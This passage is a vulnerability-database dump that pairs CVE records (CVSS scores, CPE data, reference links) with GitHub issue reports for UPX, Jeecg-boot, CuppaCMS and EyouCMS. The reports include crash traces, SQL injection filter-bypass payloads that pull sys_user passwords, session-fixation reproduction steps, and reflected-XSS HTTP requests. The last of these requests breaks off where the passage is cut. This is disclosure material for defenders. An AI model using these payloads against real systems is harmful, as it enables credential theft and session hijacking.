zlib data compression library 1.2.13
LZMA SDK version 4.43
doctest C++ testing framework version 2.4.9
Copyright (C) 1996-2022 Markus Franz Xaver Johannes Oberhumer
Copyright (C) 1996-2022 Laszlo Molnar
Copyright (C) 2000-2022 John F. Reiser
Copyright (C) 2002-2022 Jens Medoch
Copyright (C) 1995-2022 Jean-loup Gailly and Mark Adler
Copyright (C) 1999-2006 Igor Pavlov
Copyright (C) 2016-2021 Viktor Kirilov
UPX comes with ABSOLUTELY NO WARRANTY; for details type 'upx -L'.
```
* Host Operating System and version:
Ubuntu 16.04 LTS
* Host CPU architecture:
11th Gen Intel® Core™ i5-11500 @ 2.70GHz × 8
* Target Operating System and version:
same as Host
* Target CPU architecture:
same as Host
| heap-buffer-overflow in PackTmt::pack | https://api.github.com/repos/upx/upx/issues/632/comments | 1 | 2022-11-24T06:26:03Z | 2022-11-27T23:14:58Z | https://github.com/upx/upx/issues/632 | 1,462,826,378 | 632 |
CVE-2023-23457 | 2023-01-12T19:15:24.810 | A Segmentation fault was found in UPX in PackLinuxElf64::invert_pt_dynamic() in p_lx_elf.cpp. An attacker with a crafted input file allows invalid memory address access that could lead to a denial of service. | {
"cvssMetricV2": null,
"cvssMetricV30": null,
"cvssMetricV31": [
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "LOCAL",
"availabilityImpact": "HIGH",
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "NONE",
"integrityImpact": "NONE",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "REQUIRED",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"exploitabilityScore": 1.8,
"impactScore": 3.6,
"source": "[email protected]",
"type": "Primary"
},
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "LOCAL",
"availabilityImpact": "LOW",
"baseScore": 5.3,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "LOW",
"integrityImpact": "LOW",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "REQUIRED",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:L/I:L/A:L",
"version": "3.1"
},
"exploitabilityScore": 1.8,
"impactScore": 3.4,
"source": "[email protected]",
"type": "Secondary"
}
]
} | [
{
"source": "[email protected]",
"tags": [
"Issue Tracking",
"Patch",
"Third Party Advisory"
],
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2160382"
},
{
"source": "[email protected]",
"tags": [
"Patch",
"Third Party Advisory"
],
"url": "https://github.com/upx/upx/commit/779b648c5f6aa9b33f4728f79dd4d0efec0bf860"
},
{
"source": "[email protected]",
"tags": [
"Exploit",
"Patch",
"Third Party Advisory"
],
"url": "https://github.com/upx/upx/issues/631"
},
{
"source": "[email protected]",
"tags": null,
"url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/EL3BVKIGG3SH6I3KPOYQAWCBD4UMPOPI/"
},
{
"source": "[email protected]",
"tags": null,
"url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/TGEP3FBNRZXGLIA2B2ICMB32JVMPREFZ/"
}
] | [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:upx_project:upx:*:*:*:*:*:*:*:*",
"matchCriteriaId": "191334EB-C1FD-4A4C-A48A-139452FD5DF4",
"versionEndExcluding": "2022-11-23",
"versionEndIncluding": null,
"versionStartExcluding": null,
"versionStartIncluding": null,
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
],
"operator": null
},
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:fedoraproject:fedora:36:*:*:*:*:*:*:*",
"matchCriteriaId": "5C675112-476C-4D7C-BCB9-A2FB2D0BC9FD",
"versionEndExcluding": null,
"versionEndIncluding": null,
"versionStartExcluding": null,
"versionStartIncluding": null,
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:fedoraproject:fedora:37:*:*:*:*:*:*:*",
"matchCriteriaId": "E30D0E6F-4AE8-4284-8716-991DFA48CC5D",
"versionEndExcluding": null,
"versionEndIncluding": null,
"versionStartExcluding": null,
"versionStartIncluding": null,
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
],
"operator": null
}
] | https://github.com/upx/upx/issues/631 | [
"Exploit",
"Patch",
"Third Party Advisory"
] | github.com | [
"upx",
"upx"
] | This issue tracker is **ONLY** used for reporting bugs.
Please use [stackoverflow](https://stackoverflow.com) for supporting issues.
<!---
IF YOU REMOVE THIS TEMPLATE WE WILL CLOSE YOUR ISSUE WITHOUT RESPONSE.
Just read it and fill in the details we're asking, it saves so much of our time. Thanks!
-->
## What's the problem (or question)?
<!--- If describing a bug, tell us what happens instead of the expected behavior -->
<!--- If suggesting a change/improvement, explain the difference from current behavior -->
UPX4.0.1 shows "Bus Error".
SEGV on /home/chen/upx/src/p_lx_elf.cpp:5783 PackLinuxElf64::invert_pt_dynamic(N_Elf::Dyn<N_Elf::ElfITypes<LE16, LE32, LE64, LE64, LE64> > const*, unsigned long long)
ASAN
```
Ultimate Packer for eXecutables
Copyright (C) 1996 - 2022
UPX git-fdec47+ Markus Oberhumer, Laszlo Molnar & John Reiser Nov 16th 2022
File size Ratio Format Name
-------------------- ------ ----------- -----------
ASAN:SIGSEGV
=================================================================
==33120==ERROR: AddressSanitizer: SEGV on unknown address 0x1000b7ff78d0 (pc 0x000000484c1d bp 0x7fffffffc9f0 sp 0x7fffffffc610 T0)
#0 0x484c1c in PackLinuxElf64::invert_pt_dynamic(N_Elf::Dyn<N_Elf::ElfITypes<LE16, LE32, LE64, LE64, LE64> > const*, unsigned long long) /home/chen/upx/src/p_lx_elf.cpp:5783
#1 0x495c66 in PackLinuxElf64::invert_pt_dynamic(N_Elf::Dyn<N_Elf::ElfITypes<LE16, LE32, LE64, LE64, LE64> > const*, unsigned long long) /home/chen/upx/src/p_lx_elf.cpp:825
#2 0x495c66 in PackLinuxElf64::PackLinuxElf64help1(InputFile*) /home/chen/upx/src/p_lx_elf.cpp:826
#3 0x496c6a in PackLinuxElf64Le::PackLinuxElf64Le(InputFile*) /home/chen/upx/src/p_lx_elf.h:430
#4 0x496c6a in PackLinuxElf64amd::PackLinuxElf64amd(InputFile*) /home/chen/upx/src/p_lx_elf.cpp:1042
#5 0x5757a0 in PackMaster::visitAllPackers(Packer* (*)(Packer*, void*), InputFile*, options_t const*, void*) /home/chen/upx/src/packmast.cpp:194
#6 0x577311 in PackMaster::getPacker(InputFile*) /home/chen/upx/src/packmast.cpp:238
#7 0x57744f in PackMaster::pack(OutputFile*) /home/chen/upx/src/packmast.cpp:258
#8 0x61ca72 in do_one_file(char const*, char*) /home/chen/upx/src/work.cpp:157
#9 0x61cf89 in do_files(int, int, char**) /home/chen/upx/src/work.cpp:271
#10 0x45fe9f in upx_main(int, char**) /home/chen/upx/src/main.cpp:1266
#11 0x407223 in main /home/chen/upx/src/main.cpp:1324
#12 0x7ffff621f83f in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x2083f)
#13 0x409ef8 in _start (/home/chen/ifcut/upx/upx-asan+0x409ef8)
AddressSanitizer can not provide additional info.
SUMMARY: AddressSanitizer: SEGV /home/chen/upx/src/p_lx_elf.cpp:5783 PackLinuxElf64::invert_pt_dynamic(N_Elf::Dyn<N_Elf::ElfITypes<LE16, LE32, LE64, LE64, LE64> > const*, unsigned long long)
==33120==ABORTING
```
gdb
```
(gdb) bt
#0 0x0000000000484c1d in PackLinuxElf64::invert_pt_dynamic (
this=this@entry=0x61b00001f180, dynp=<optimized out>, headway=<optimized out>)
at /home/chen/upx/src/p_lx_elf.cpp:5783
#1 0x0000000000495c67 in PackLinuxElf64::invert_pt_dynamic (headway=<optimized out>,
dynp=<optimized out>, this=0x61b00001f180) at /home/chen/upx/src/p_lx_elf.cpp:825
#2 PackLinuxElf64::PackLinuxElf64help1 (this=this@entry=0x61b00001f180,
f=f@entry=0x7fffffffcc70) at /home/chen/upx/src/p_lx_elf.cpp:826
#3 0x0000000000496c6b in PackLinuxElf64Le::PackLinuxElf64Le (f=0x7fffffffcc70,
this=0x61b00001f180) at /home/chen/upx/src/p_lx_elf.h:430
#4 PackLinuxElf64amd::PackLinuxElf64amd (this=0x61b00001f180, f=0x7fffffffcc70)
at /home/chen/upx/src/p_lx_elf.cpp:1042
#5 0x00000000005757a1 in PackMaster::visitAllPackers (
func=0x577870 <try_pack(Packer*, void*)>, f=0x7fffffffcc70, o=0x7fffffffce88,
user=0x7fffffffcc70) at /home/chen/upx/src/packmast.cpp:194
#6 0x0000000000577312 in PackMaster::getPacker (f=<optimized out>)
at /home/chen/upx/src/packmast.cpp:238
#7 0x0000000000577450 in PackMaster::pack (this=this@entry=0x7fffffffce70,
fo=fo@entry=0x7fffffffcd70) at /home/chen/upx/src/packmast.cpp:258
#8 0x000000000061ca73 in do_one_file (iname=iname@entry=0x7fffffffdede "./POC2",
oname=oname@entry=0x7fffffffd4c0 "./POC2.000") at /home/chen/upx/src/work.cpp:157
#9 0x000000000061cf8a in do_files (i=i@entry=1, argc=argc@entry=2,
argv=argv@entry=0x7fffffffda98) at /home/chen/upx/src/work.cpp:271
#10 0x000000000045fea0 in upx_main (argc=<optimized out>, argv=<optimized out>)
at /home/chen/upx/src/main.cpp:1266
#11 0x0000000000407224 in main (argc=2, argv=0x7fffffffda98)
at /home/chen/upx/src/main.cpp:1324
```
## What should have happened?
<!--- If you're describing a bug, tell us what should happen -->
<!--- If you're suggesting a change/improvement, tell us how it should work -->
No Bus error.
## Do you have an idea for a solution?
<!--- Not obligatory, but suggest a fix/reason for the bug, -->
<!--- or ideas how to implement the addition or change -->
## How can we reproduce the issue?
<!--- Provide unambiguous set of steps to reproduce this bug. Include code to reproduce, if relevant -->
1. Build UPX 4.0.1 (the latest version)
2. Run
` ./upx ./POC2`
zipped poc:
[POC2.zip](https://github.com/upx/upx/files/10080300/POC2.zip)
## Please tell us details about your environment.
<!--- Include as many relevant details about the environment you experienced the bug in -->
* UPX version used (`upx --version`):
```
./upx --version
upx v4.0.1-dirty
UCL data compression library 1.03
zlib data compression library 1.2.13
LZMA SDK version 4.43
doctest C++ testing framework version 2.4.9
Copyright (C) 1996-2022 Markus Franz Xaver Johannes Oberhumer
Copyright (C) 1996-2022 Laszlo Molnar
Copyright (C) 2000-2022 John F. Reiser
Copyright (C) 2002-2022 Jens Medoch
Copyright (C) 1995-2022 Jean-loup Gailly and Mark Adler
Copyright (C) 1999-2006 Igor Pavlov
Copyright (C) 2016-2021 Viktor Kirilov
UPX comes with ABSOLUTELY NO WARRANTY; for details type 'upx -L'.
```
* Host Operating System and version:
`Ubuntu 16.04 LTS`
* Host CPU architecture:
`11th Gen Intel® Core™ i5-11500 @ 2.70GHz × 8`
* Target Operating System and version:
`same as Host`
* Target CPU architecture:
`same as Host` | SEGV on PackLinuxElf64::invert_pt_dynamic | https://api.github.com/repos/upx/upx/issues/631/comments | 1 | 2022-11-24T02:21:53Z | 2022-11-27T23:16:30Z | https://github.com/upx/upx/issues/631 | 1,462,658,711 | 631 |
CVE-2022-47105 | 2023-01-19T16:15:11.277 | Jeecg-boot v3.4.4 was discovered to contain a SQL injection vulnerability via the component /sys/dict/queryTableData. | {
"cvssMetricV2": null,
"cvssMetricV30": null,
"cvssMetricV31": [
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 9.8,
"baseSeverity": "CRITICAL",
"confidentialityImpact": "HIGH",
"integrityImpact": "HIGH",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
"version": "3.1"
},
"exploitabilityScore": 3.9,
"impactScore": 5.9,
"source": "[email protected]",
"type": "Primary"
}
]
} | [
{
"source": "[email protected]",
"tags": [
"Exploit",
"Patch",
"Third Party Advisory"
],
"url": "https://github.com/jeecgboot/jeecg-boot/issues/4393"
}
] | [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:jeecg:jeecg_boot:3.4.4:*:*:*:*:*:*:*",
"matchCriteriaId": "7BB811AB-8B4F-4A5A-8851-B617184A298A",
"versionEndExcluding": null,
"versionEndIncluding": null,
"versionStartExcluding": null,
"versionStartIncluding": null,
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
],
"operator": null
}
] | https://github.com/jeecgboot/jeecg-boot/issues/4393 | [
"Exploit",
"Patch",
"Third Party Advisory"
] | github.com | [
"jeecgboot",
"jeecg-boot"
] | ##### 版本号:3.4.4
##### 前端版本:vue2版
##### 问题描述:sql注入检测代码存在绕过.
##### 截图&代码:
SqlInjectionUtil类中sql的注释正则为
```java
private final static Pattern SQL_ANNOTATION = Pattern.compile("/\\*.*\\*/");
```
.无法匹配到%0A, 导致可以利用/\*%0A\*/绕过
关键字检测后存在空格,导致绕过
```java
private final static String XSS_STR = "and |extractvalue|updatexml|exec |insert |select |delete |update |drop |count |chr |mid |master |truncate |char |declare |;|or |+|user()";
```
AbstractQueryBlackListHandler类中的黑名单:
```java
ruleMap.put("sys_user", "password,salt");
```
在isPass函数中ruleMap.get(name)为null即可绕过, 可以采用`sys_user`, (sys_user), sys_user%20等绕过
存在多个注入点:
1. /sys/duplicate/check接口:
```java
dataId=2000&fieldName=(select(if(((select/*%0A*/password/*%0A*/from/*%0A*/sys_user/*%0A*/where/*%0A*/username/*%0A*/='jeecg')='eee378a1258530cb'),sleep(4),1)))&fieldVal=1000&tableName=sys_log
```
<img width="776" alt="image" src="https://user-images.githubusercontent.com/50673654/206842653-b762d643-9c64-4943-ba99-3b68433da3b0.png">
2. /sys/api/getDictItems
该接口没有进行签名校验:
<img width="918" alt="image" src="https://user-images.githubusercontent.com/50673654/206842298-694b3b2b-8ea4-4e55-a7f9-c26bd452c1ad.png">
```java
?dictCode=sys_user%20,username,password
```
<img width="1227" alt="image" src="https://user-images.githubusercontent.com/50673654/206842680-083f2c1f-8c1a-47eb-a4f1-5eb7b677c4cb.png">
3. sys/dict/queryTableData
```java
?table=%60sys_user%60&pageSize=22&pageNo=1&text=username&code=password
```
<img width="1228" alt="image" src="https://user-images.githubusercontent.com/50673654/206842700-9446ac05-18f2-4791-8e26-c78a1f934a09.png">
#### 友情提示(为了提高issue处理效率):
- 未按格式要求发帖,会被直接删掉;
- 描述过于简单或模糊,导致无法处理的,会被直接删掉;
- 请自己初判问题描述是否清楚,是否方便我们调查处理;
- 针对问题请说明是Online在线功能(需说明用的主题模板),还是生成的代码功能;
| jeecg-boot3.4.4 存在sql注入漏洞 | https://api.github.com/repos/jeecgboot/JeecgBoot/issues/4393/comments | 2 | 2022-12-10T09:17:39Z | 2022-12-23T06:03:37Z | https://github.com/jeecgboot/JeecgBoot/issues/4393 | 1,488,266,227 | 4,393 |
CVE-2021-29368 | 2023-01-20T19:15:13.250 | Session fixation vulnerability in CuppaCMS thru commit 4c9b742b23b924cf4c1f943f48b278e06a17e297 on November 12, 2019 allows attackers to gain access to arbitrary user sessions. | {
"cvssMetricV2": null,
"cvssMetricV30": null,
"cvssMetricV31": [
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 8.8,
"baseSeverity": "HIGH",
"confidentialityImpact": "HIGH",
"integrityImpact": "HIGH",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "REQUIRED",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
"version": "3.1"
},
"exploitabilityScore": 2.8,
"impactScore": 5.9,
"source": "[email protected]",
"type": "Primary"
}
]
} | [
{
"source": "[email protected]",
"tags": [
"Exploit",
"Issue Tracking",
"Mitigation",
"Third Party Advisory"
],
"url": "https://github.com/CuppaCMS/CuppaCMS/issues/8"
}
] | [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:cuppacms:cuppacms:*:*:*:*:*:*:*:*",
"matchCriteriaId": "25182935-24F3-4028-A4E5-95BB51377EB7",
"versionEndExcluding": null,
"versionEndIncluding": "2019-11-12",
"versionStartExcluding": null,
"versionStartIncluding": null,
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
],
"operator": null
}
] | https://github.com/CuppaCMS/CuppaCMS/issues/8 | [
"Exploit",
"Issue Tracking",
"Mitigation",
"Third Party Advisory"
] | github.com | [
"CuppaCMS",
"CuppaCMS"
] | **Cuppa CMS is prone to a session fixation attack.**
Description: Session Fixation is an attack that permits an attacker to hijack a valid user session. The attack explores a limitation in the way the web application manages the session ID, more specifically the vulnerable web application. When authenticating a user, it doesn’t assign a new session ID, making it possible to use an existent session ID. The attack consists of obtaining a valid session ID (e.g. by connecting to the application), inducing a user to authenticate himself with that session ID, and then hijacking the user-validated session by the knowledge of the used session ID. The attacker has to provide a legitimate Web application session ID and try to make the victim’s browser use it.
**Steps to Reproduce:**
1. Access the cuppa cms login page using the http://127.0.0.1:880/cuppa_cms/administrator/
2. Enter the wrong username and password to generate dummy session tokens
3. Copy the non-authenticated session tokens and insert it into another browser(chrome) in the victim machine.
4. Enter the valid credential to log in to the application.
5. Once you login to the application go back to the attacker browser and refresh the URL.
6. An attacker is able to access the victim session successfully.
**Session Values Before Login: Attacker Machine**

**Session Values Before Login: Victim Machine**

**Session token once fix the victim Machine**

**Session Values after Login: Victim Machine**

**Session Values for the attacker - Just refresh the browser**

**Mitigation:**
The application should always first invalidate the existing session ID before authenticating a user, and if the authentication is successful, provide another session. | Session Fixation in CuppaCMS | https://api.github.com/repos/CuppaCMS/CuppaCMS/issues/8/comments | 1 | 2020-06-16T17:01:59Z | 2020-07-01T14:53:11Z | https://github.com/CuppaCMS/CuppaCMS/issues/8 | 639,831,189 | 8 |
CVE-2022-45537 | 2023-01-20T19:15:16.093 | EyouCMS <= 1.6.0 was discovered a reflected-XSS in the article publish component in cookie "ENV_LIST_URL". | {
"cvssMetricV2": null,
"cvssMetricV30": null,
"cvssMetricV31": [
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "NONE",
"baseScore": 6.1,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "LOW",
"integrityImpact": "LOW",
"privilegesRequired": "NONE",
"scope": "CHANGED",
"userInteraction": "REQUIRED",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
"version": "3.1"
},
"exploitabilityScore": 2.8,
"impactScore": 2.7,
"source": "[email protected]",
"type": "Primary"
}
]
} | [
{
"source": "[email protected]",
"tags": [
"Exploit",
"Issue Tracking",
"Third Party Advisory"
],
"url": "https://github.com/weng-xianhu/eyoucms/issues/34"
}
] | [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:eyoucms:eyoucms:*:*:*:*:*:*:*:*",
"matchCriteriaId": "9EC81B77-6034-40EF-93BE-42D2F85B3974",
"versionEndExcluding": null,
"versionEndIncluding": "1.6.0",
"versionStartExcluding": null,
"versionStartIncluding": null,
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
],
"operator": null
}
] | https://github.com/weng-xianhu/eyoucms/issues/34 | [
"Exploit",
"Issue Tracking",
"Third Party Advisory"
] | github.com | [
"weng-xianhu",
"eyoucms"
] | ## Background of Website Reflected Cross-Site Scripting
### Influenced Version
<= 1.6.0-UTF8-SP1
<img width="2048" alt="image" src="https://user-images.githubusercontent.com/22876693/201610031-73f82844-05e0-4182-a275-028613c349bd.png">
### Description
Background article publish with reflected-XSS in the cookie "ENV_LIST_URL".
### POC
```text
POST /cms/eyoucms/login.php?m=admin&c=Article&a=add&lang=cn HTTP/1.1
Host: 127.0.0.1:80
Connection: close
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Origin: http://127.0.0.1
Referer: http://127.0.0.1/cms/eyoucms/login.php?m=admin&c=Article&a=add&typeid=10&gourl=http%3A%2F%2F10.142.11.10%3A20003%2Feyoucms%2Flogin.php%3Fm%3Dadmin%26c%3DArchives%26a%3Dindex_archives%26typeid%3D10%26lang%3Dcn&lang=cn
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8
Cookie: PHPSESSID=lmqk1pcmj5egvt269qo4ijgg82; admin_lang=cn; home_lang=cn; referurl=http%3A%2F%2F127.0.0.1%2Fcms%2Feyoucms%2Findex.php%3Fm%3Duser%26c%3DPay%26a%3Dpay_consumer_details; users_id=1; ENV_IS_UPHTML=0; workspaceParam=index%7CArchives; ENV_GOBACK_URL=%2Feyoucms%2Flogin.php%3Fm%3Dadmin%26c%3DArchives%26a%3Dindex_archives%26lang%3D=cn; ENV_LIST_URL=%2Feyoucms%2Flogin.php%3Fm%3Dadmin%26c%3DArchives%26a%3Dindex_archives%26lang%3Dcn"/><script>alert(1)</script><a
Content-Type: application/x-www-form-urlencoded
Content-Length: 383
gourl=&free_content=&htmlfilename=&type_tempview=view_article.htm&tempview=view_article.htm&add_time=2022-11-05+20:47:11&arcrank=0&click=846&author=aa&seo_description=gaeg&seo_keywords=egae&seo_title=aeg&tags=aeg%2C%E6%93%8D%E4%BD%9C%E7%B3%BB%E7%BB%9F&addonFieldExt[content]=<p>aegaeg</p>&size=1&part_free=0&users_price=&litpic_remote=&litpic_local=&jumplinks=&typeid=11&title=aegaeg
```
### Screen Shoot
<img width="1865" alt="image" src="https://user-images.githubusercontent.com/22876693/201614458-17b781bf-148a-419c-9b92-7e9f0527d78d.png">
> Reported by Srpopty, vulnerability discovered by using Corax.
| Vulnerability: EyouCMS-V1.6.0-UTF8-SP1 with Reflected Cross-Site Scripting | https://api.github.com/repos/weng-xianhu/eyoucms/issues/34/comments | 1 | 2022-11-14T08:44:20Z | 2023-02-20T10:13:49Z | https://github.com/weng-xianhu/eyoucms/issues/34 | 1,447,630,496 | 34 |
CVE-2022-45538 | 2023-01-20T19:15:16.160 | EyouCMS <= 1.6.0 was discovered a reflected-XSS in the article publish component in cookie "ENV_GOBACK_URL". | {
"cvssMetricV2": null,
"cvssMetricV30": null,
"cvssMetricV31": [
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "NONE",
"baseScore": 6.1,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "LOW",
"integrityImpact": "LOW",
"privilegesRequired": "NONE",
"scope": "CHANGED",
"userInteraction": "REQUIRED",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
"version": "3.1"
},
"exploitabilityScore": 2.8,
"impactScore": 2.7,
"source": "[email protected]",
"type": "Primary"
}
]
} | [
{
"source": "[email protected]",
"tags": [
"Exploit",
"Issue Tracking",
"Third Party Advisory"
],
"url": "https://github.com/weng-xianhu/eyoucms/issues/35"
}
] | [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:eyoucms:eyoucms:*:*:*:*:*:*:*:*",
"matchCriteriaId": "9EC81B77-6034-40EF-93BE-42D2F85B3974",
"versionEndExcluding": null,
"versionEndIncluding": "1.6.0",
"versionStartExcluding": null,
"versionStartIncluding": null,
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
],
"operator": null
}
] | https://github.com/weng-xianhu/eyoucms/issues/35 | [
"Exploit",
"Issue Tracking",
"Third Party Advisory"
] | github.com | [
"weng-xianhu",
"eyoucms"
] | ## Background of Website Reflected Cross-Site Scripting
### Influenced Version
<= 1.6.0-UTF8-SP1
<img width="2048" alt="image" src="https://user-images.githubusercontent.com/22876693/201610031-73f82844-05e0-4182-a275-028613c349bd.png">
### Description
Background article publish with reflected-XSS in the cookie "ENV_GOBACK_URL".
### POC
```text
POST /cms/eyoucms/login.php?m=admin&c=Article&a=add&lang=cn HTTP/1.1
Host: 127.0.0.1:80
Connection: close
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Origin: http://127.0.0.1
Referer: http://127.0.0.1/cms/eyoucms/login.php?m=admin&c=Article&a=add&typeid=10&gourl=http%3A%2F%2F10.142.11.10%3A20003%2Feyoucms%2Flogin.php%3Fm%3Dadmin%26c%3DArchives%26a%3Dindex_archives%26typeid%3D10%26lang%3Dcn&lang=cn
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8
Cookie: PHPSESSID=lmqk1pcmj5egvt269qo4ijgg82; admin_lang=cn; home_lang=cn; referurl=http%3A%2F%2F127.0.0.1%2Fcms%2Feyoucms%2Findex.php%3Fm%3Duser%26c%3DPay%26a%3Dpay_consumer_details; users_id=1; ENV_IS_UPHTML=0; workspaceParam=index%7CArchives; ENV_GOBACK_URL=%2Feyoucms%2Flogin.php%3Fm%3Dadmin%26c%3DArchives%26a%3Dindex_archives%26lang%3D"/><script>alert(1)</script><a; ENV_LIST_URL=%2Feyoucms%2Flogin.php%3Fm%3Dadmin%26c%3DArchives%26a%3Dindex_archives%26lang%3Dcn
Content-Type: application/x-www-form-urlencoded
Content-Length: 383
gourl=&free_content=&htmlfilename=&type_tempview=view_article.htm&tempview=view_article.htm&add_time=2022-11-05+20:47:11&arcrank=0&click=846&author=aa&seo_description=gaeg&seo_keywords=egae&seo_title=aeg&tags=aeg%2C%E6%93%8D%E4%BD%9C%E7%B3%BB%E7%BB%9F&addonFieldExt[content]=<p>aegaeg</p>&size=1&part_free=0&users_price=&litpic_remote=&litpic_local=&jumplinks=&typeid=11&title=aegaeg
```
### Screen Shoot
<img width="1576" alt="image" src="https://user-images.githubusercontent.com/22876693/201615717-be81fb04-1140-4e59-b83b-16244cab3fc8.png">
> Reported by Srpopty, vulnerability discovered by using Corax.
| Vulnerability: EyouCMS-V1.6.0-UTF8-SP1 with Reflected Cross-Site Scripting | https://api.github.com/repos/weng-xianhu/eyoucms/issues/35/comments | 1 | 2022-11-14T08:49:28Z | 2023-02-20T10:13:18Z | https://github.com/weng-xianhu/eyoucms/issues/35 | 1,447,638,304 | 35 |
CVE-2022-45539 | 2023-01-20T19:15:16.223 | EyouCMS <= 1.6.0 was discovered a reflected-XSS in FileManager component in GET value "activepath" when creating a new file. | {
"cvssMetricV2": null,
"cvssMetricV30": null,
"cvssMetricV31": [
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "NONE",
"baseScore": 6.1,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "LOW",
"integrityImpact": "LOW",
"privilegesRequired": "NONE",
"scope": "CHANGED",
"userInteraction": "REQUIRED",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
"version": "3.1"
},
"exploitabilityScore": 2.8,
"impactScore": 2.7,
"source": "[email protected]",
"type": "Primary"
}
]
} | [
{
"source": "[email protected]",
"tags": [
"Exploit",
"Issue Tracking",
"Third Party Advisory"
],
"url": "https://github.com/weng-xianhu/eyoucms/issues/38"
}
] | [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:eyoucms:eyoucms:*:*:*:*:*:*:*:*",
"matchCriteriaId": "9EC81B77-6034-40EF-93BE-42D2F85B3974",
"versionEndExcluding": null,
"versionEndIncluding": "1.6.0",
"versionStartExcluding": null,
"versionStartIncluding": null,
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
],
"operator": null
}
] | https://github.com/weng-xianhu/eyoucms/issues/38 | [
"Exploit",
"Issue Tracking",
"Third Party Advisory"
] | github.com | [
"weng-xianhu",
"eyoucms"
] | ## Background of Website Reflected Cross-Site Scripting
### Influenced Version
<= 1.6.0-UTF8-SP1
<img width="2048" alt="image" src="https://user-images.githubusercontent.com/22876693/201610031-73f82844-05e0-4182-a275-028613c349bd.png">
### Description
Background file adding with reflected-XSS in the get value "activepath".
### POC
```text
GET /cms/eyoucms/login.php?m=admin&c=Filemanager&a=newfile&activepath=%3Atemplate"/><script>alert(1)</script><a&lang=cn HTTP/1.1
Host: 127.0.0.1:80
Connection: close
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Origin: http://127.0.0.1
Referer: http://127.0.0.1/cms/eyoucms/login.php?m=admin&c=Filemanager&a=index&lang=cn
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8
